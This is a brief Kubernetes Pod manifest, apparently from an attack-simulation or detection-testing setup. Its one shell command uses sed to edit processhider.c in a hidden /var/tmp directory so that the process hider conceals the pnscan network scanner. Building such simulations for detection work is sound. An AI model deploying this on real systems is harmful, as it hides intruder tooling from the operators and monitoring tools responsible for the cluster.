apiVersion: v1
kind: Pod
metadata:
  name: process-hiding
spec:
  containers:
  - name: process-hiding
    image: angelrita/base-ubuntu:latest
    #imagePullPolicy: Never
    command: ["sh"]
    args: ['-c', 'sed -i s/evil_script.py/pnscan/g /var/tmp/.11/..lph/processhider.c']
